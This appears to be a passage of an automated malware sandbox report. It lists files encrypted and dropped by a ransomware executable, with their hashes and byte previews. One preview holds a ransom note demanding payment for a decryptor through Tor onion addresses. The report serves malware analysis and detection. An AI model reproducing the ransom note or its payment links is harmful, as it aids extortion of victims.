                                                                                                                                                      Preview: ...!.+.0;h.:..t=D....|R*Wx........tk....>..&.....ePm77d............E.0j..ZS..{...4=V.+.v~a..".jG...H.Gw......j...?a..Y..&...}....V...X.$u.a..z.x,.-.6.e........A..y/Y...!...A.n..$..X>.1.g..U\.;.g;..?P......."u\...!.J3..x]va1..df ..8..C.R...zQH|A..tk...v...#%[.FzP.f..ye>...d.q.mY.a...4.DKc..pn..g...b...&ay@..N[....C.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\Favorites\Bing.url.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.736386780638342
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:D3K8SYq5LF/hp3bbzK8sevWAVgKTaCB7RZ0cHYIgtyUzSGy:D3j1qdBhpXzCwgck389J
                                                                                                                                                      MD5:2AC5172C95BDFAAA5D232806C3F48A3D
                                                                                                                                                      SHA1:520862946E5BD53BACAD8FE32EB6534DD11EC5FB
                                                                                                                                                      SHA-256:3CD3F4689C04657C64144BA8B7C7947395A6D498C1E36C6AFF39B623B736C7EA
                                                                                                                                                      SHA-512:30E2F66B2F367BBF94A8F600836A8BC2CB4D159E84A5EADFDACDDD52F18198320AD02BAC0D43B4561BB52F354CD9A1C9AB480901BDF942BA774D879C46CB0208
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...!.+.0;h.:..t=D....|R*Wx........tk....>..&.....ePm77d............E.0j..ZS..{...4=V.+.v~a..".jG...H.Gw......j...?a..Y..&...}....V...X.$u.a..z.x,.-.6.e........A..y/Y...!...A.n..$..X>.1.g..U\.;.g;..?P......."u\...!.J3..x]va1..df ..8..C.R...zQH|A..tk...v...#%[.FzP.f..ye>...d.q.mY.a...4.DKc..pn..g...b...&ay@..N[....C.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\Favorites\Facebook.url
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1072
                                                                                                                                                      Entropy (8bit):5.44409675115089
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:KpbEPTlzK8sevWAVgKTaCB7RZ0cHYIgtyUzf:KpsZzCwgck38y
                                                                                                                                                      MD5:3F3C5C28A8D2812CA8527692550DCBA0
                                                                                                                                                      SHA1:10F9F81615D551FDC6D5543E3BDDAA3E50A5009F
                                                                                                                                                      SHA-256:D1DC88A0AD046D9480FC3392B9F915EFAFBCFCE1F5FD0463C86DFFC1968BBFF1
                                                                                                                                                      SHA-512:533D045696A94A83F45464779F7FF3408E4E38F011647100E0F1345D1F3D597DEAEB5568FDE9640E208D2D339C3ABC3E7AFF402BB859CB92B4152C1AC06D51C2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: "v.VG....7.....%g.ba...6.qa.1C.......q...-<\..L.......lcQ....&.AF.m..f4.T.Dh..,<l.D..+Z..G...Z_5~.x....zC^"T.'....:.=..>ut/..p(;.Wu..T|j..........x.R.....Cq..........NT.........)...O.RB*..r..Dz..BB..Y..q....B!.8....:..),._.....&}a.!..../.".. ..467 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E
                                                                                                                                                      C:\Users\user\Favorites\Facebook.url.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1072
                                                                                                                                                      Entropy (8bit):5.44409675115089
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:KpbEPTlzK8sevWAVgKTaCB7RZ0cHYIgtyUzf:KpsZzCwgck38y
                                                                                                                                                      MD5:3F3C5C28A8D2812CA8527692550DCBA0
                                                                                                                                                      SHA1:10F9F81615D551FDC6D5543E3BDDAA3E50A5009F
                                                                                                                                                      SHA-256:D1DC88A0AD046D9480FC3392B9F915EFAFBCFCE1F5FD0463C86DFFC1968BBFF1
                                                                                                                                                      SHA-512:533D045696A94A83F45464779F7FF3408E4E38F011647100E0F1345D1F3D597DEAEB5568FDE9640E208D2D339C3ABC3E7AFF402BB859CB92B4152C1AC06D51C2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: "v.VG....7.....%g.ba...6.qa.1C.......q...-<\..L.......lcQ....&.AF.m..f4.T.Dh..,<l.D..+Z..G...Z_5~.x....zC^"T.'....:.=..>ut/..p(;.Wu..T|j..........x.R.....Cq..........NT.........)...O.RB*..r..Dz..BB..Y..q....B!.8....:..),._.....&}a.!..../.".. ..467 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E
                                                                                                                                                      C:\Users\user\Favorites\Google.url
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1056
                                                                                                                                                      Entropy (8bit):5.425592777391065
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:rtZDsixszK8sevWAVgKTaCB7RZ0cHYIgtyUzvp9jH0:QzCwgck38s90
                                                                                                                                                      MD5:DFEDF9776580C8E2D98548FFEC141765
                                                                                                                                                      SHA1:53E465920804CCE90BA6E816FE5B823BCCB5D936
                                                                                                                                                      SHA-256:E8EB9AB6134FEC2AE71EF47D61D07B295CE25EF759B1585F91D03482060B0796
                                                                                                                                                      SHA-512:728773FF18F1D245912E88528E9710883560C190AE79B752651A8518E0B52AFF9DA87A24DFEECC92F270BA3ACBC92EEBA6DD3445F5176746D0F15F955E6A4386
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..!.......!..<...:.+...~......d.x..7..X..#.....~..(Fvn......;/.....\..@.u].W...h.v?.../PC...Jts.......BdU..?Xx(.*V.Cm..t.K'z..$&....h.......fL{......H..\3.S.6.[.b..Y........Kk....T...Q.d.ZX]..M...U.......lM.@.D,5.)0.J"...p.1..(%.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2
                                                                                                                                                      C:\Users\user\Favorites\Google.url.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1056
                                                                                                                                                      Entropy (8bit):5.425592777391065
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:rtZDsixszK8sevWAVgKTaCB7RZ0cHYIgtyUzvp9jH0:QzCwgck38s90
                                                                                                                                                      MD5:DFEDF9776580C8E2D98548FFEC141765
                                                                                                                                                      SHA1:53E465920804CCE90BA6E816FE5B823BCCB5D936
                                                                                                                                                      SHA-256:E8EB9AB6134FEC2AE71EF47D61D07B295CE25EF759B1585F91D03482060B0796
                                                                                                                                                      SHA-512:728773FF18F1D245912E88528E9710883560C190AE79B752651A8518E0B52AFF9DA87A24DFEECC92F270BA3ACBC92EEBA6DD3445F5176746D0F15F955E6A4386
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..!.......!..<...:.+...~......d.x..7..X..#.....~..(Fvn......;/.....\..@.u].W...h.v?.../PC...Jts.......BdU..?Xx(.*V.Cm..t.K'z..$&....h.......fL{......H..\3.S.6.[.b..Y........Kk....T...Q.d.ZX]..M...U.......lM.@.D,5.)0.J"...p.1..(%.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2
                                                                                                                                                      C:\Users\user\Favorites\Links\desktop.ini
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1024
                                                                                                                                                      Entropy (8bit):5.272876357733836
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:mQtkngzK8sevWAVgKTaCB7RZ0cHYIgtyUzvZ:mQygzCwgck380
                                                                                                                                                      MD5:B39B6052B6B85F46F75A41B88321C56F
                                                                                                                                                      SHA1:2EE8783D3C7AB1EACF1A2931A6B48B7A5BB79D60
                                                                                                                                                      SHA-256:99CE83CBC52587F08DE235CFB460435426B3B25191924C1BDC1DF8F900239763
                                                                                                                                                      SHA-512:F9F7B19AB31F8F29A2FAC7DA3BA0BEF81E25621F204444350586F8118F19D600968F77D12616F9736868F79EDC71FCCE584A9CF09B4DD83EBE9529BEBF21D816
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: VH$.#..t`P.c..M.N.K..,.R=.ez..'z.._....Q..B...E.E...d.L....\+._.h.U.L.+{.\Y_sDchO.\.Z..9...9........J...[2:F..p_.....G..U...g|...#nZ...kN.M.....||...{...3.h].........A.....u;r..d<..K.E....c....C7.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74...6.3.I..T6..X.{UF......
                                                                                                                                                      C:\Users\user\Favorites\Links\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1024
                                                                                                                                                      Entropy (8bit):5.272876357733836
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:mQtkngzK8sevWAVgKTaCB7RZ0cHYIgtyUzvZ:mQygzCwgck380
                                                                                                                                                      MD5:B39B6052B6B85F46F75A41B88321C56F
                                                                                                                                                      SHA1:2EE8783D3C7AB1EACF1A2931A6B48B7A5BB79D60
                                                                                                                                                      SHA-256:99CE83CBC52587F08DE235CFB460435426B3B25191924C1BDC1DF8F900239763
                                                                                                                                                      SHA-512:F9F7B19AB31F8F29A2FAC7DA3BA0BEF81E25621F204444350586F8118F19D600968F77D12616F9736868F79EDC71FCCE584A9CF09B4DD83EBE9529BEBF21D816
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: VH$.#..t`P.c..M.N.K..,.R=.ez..'z.._....Q..B...E.E...d.L....\+._.h.U.L.+{.\Y_sDchO.\.Z..9...9........J...[2:F..p_.....G..U...g|...#nZ...kN.M.....||...{...3.h].........A.....u;r..d<..K.E....c....C7.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74...6.3.I..T6..X.{UF......
                                                                                                                                                      C:\Users\user\Favorites\Links\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\Favorites\Live.url
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1056
                                                                                                                                                      Entropy (8bit):5.412736912351346
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:jQ2Ixz+yHh2tf1caqzK8sevWAVgKTaCB7RZ0cHYIgtyUz/KD:jjE+yQ1gzCwgck38p
                                                                                                                                                      MD5:1DA71BC736C7BE0A8AE016A2C4253095
                                                                                                                                                      SHA1:AB0F6F7434808432B30C2956325C1D105CE19C07
                                                                                                                                                      SHA-256:3BFD3A197DEC251E87EAA4514205CA4371E5B6BEE220BA75EEDA9D36E6067723
                                                                                                                                                      SHA-512:F69AC62D9BBB7AEF8D0B63CFC6EE6253C08106FA9DC9076A7939FBB15E55889D9AD43205942C673088D3876B79E97CD4A9AACF417AD9A2A2058B19C13F5AD537
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....d.qESj..o.".yS.......K\F.^.....e...B.C...:b..K.V.!.c.i....7..M..Mz=nP=.s..X.P..li..;H.......7.~.Z(.e.)...C..\.`.u..V.H4-...H(...'.(....U.........v.U.;T.&S,G+.o$..d.......2.{...$.$.8.VF.3..=$.F...5......*i.....}in.0.D~...u67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2
                                                                                                                                                      C:\Users\user\Favorites\Live.url.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1056
                                                                                                                                                      Entropy (8bit):5.412736912351346
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:jQ2Ixz+yHh2tf1caqzK8sevWAVgKTaCB7RZ0cHYIgtyUz/KD:jjE+yQ1gzCwgck38p
                                                                                                                                                      MD5:1DA71BC736C7BE0A8AE016A2C4253095
                                                                                                                                                      SHA1:AB0F6F7434808432B30C2956325C1D105CE19C07
                                                                                                                                                      SHA-256:3BFD3A197DEC251E87EAA4514205CA4371E5B6BEE220BA75EEDA9D36E6067723
                                                                                                                                                      SHA-512:F69AC62D9BBB7AEF8D0B63CFC6EE6253C08106FA9DC9076A7939FBB15E55889D9AD43205942C673088D3876B79E97CD4A9AACF417AD9A2A2058B19C13F5AD537
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....d.qESj..o.".yS.......K\F.^.....e...B.C...:b..K.V.!.c.i....7..M..Mz=nP=.s..X.P..li..;H.......7.~.Z(.e.)...C..\.`.u..V.H4-...H(...'.(....U.........v.U.;T.&S,G+.o$..d.......2.{...$.$.8.VF.3..=$.F...5......*i.....}in.0.D~...u67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2
                                                                                                                                                      C:\Users\user\Favorites\NYTimes.url
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1056
                                                                                                                                                      Entropy (8bit):5.382918120434767
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:G49OFRbzTZ7MIezK8sevWAVgKTaCB7RZ0cHYIgtyUzc:/9iRvd7MIezCwgck38R
                                                                                                                                                      MD5:13FC8958F42A404C9E9EB635B37136CA
                                                                                                                                                      SHA1:ECB3303A1BBD0C51E81761510F32474349844886
                                                                                                                                                      SHA-256:B66FAC69CD2C583F5660237592F4310DA702035B3BAE29AFBB6EC12387522958
                                                                                                                                                      SHA-512:F2F0C8F1EF4B8F0B1C130E76E36317AD6F0D96252C012886C2DCB6D532417F9D26737D032CA453BA7069D74F4AD6021468067D71D3FC7F171EB3E5325A8D03B3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: &.~Z.;..\H1.....%~..V..4...R.?Q..rl^.Oh.~.0.+#....l...J....ZP.......hX...........n..p...R.)......7a^..FC.$..3...3....z.d..Vwy.+..s.....4.3...IMuy.<J.}d..9t~..}I;GDY-%\.v7U.v. ..38Z..^.|..._.Y........N.e^GA..)D.i[`...mr..U..d...`..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2
